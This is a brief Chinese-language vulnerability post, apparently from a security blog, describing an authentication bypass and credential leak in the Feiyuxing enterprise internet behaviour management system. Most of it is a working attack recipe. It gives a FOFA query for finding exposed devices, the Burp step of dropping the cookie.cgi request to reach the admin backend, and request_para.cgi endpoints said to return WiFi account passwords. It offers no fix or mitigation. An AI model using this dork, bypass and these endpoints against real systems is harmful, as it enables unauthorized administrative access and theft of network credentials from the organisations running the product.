飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

  • A+
所属分类:安全漏洞

FoFA

title="飞鱼星企业级智能上网行为管理系统"

飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

访问 http://******/home/index.html,然后用burp抓包drop掉cookie.cgi这个包

飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

 

越权进入后台

飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

其中还存在敏感信息泄露

/request_para.cgi?parameter=wifi_info      #获取ALL WIFI账号密码

/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码

/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码

飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

 

 

 

 

相关推荐: NT RPC CPU Utilization Vulnerability

NT RPC CPU Utilization Vulnerability 漏洞ID 1105077 漏洞类型 Unknown 发布时间 1997-02-07 更新时间 1997-02-07 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVS…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: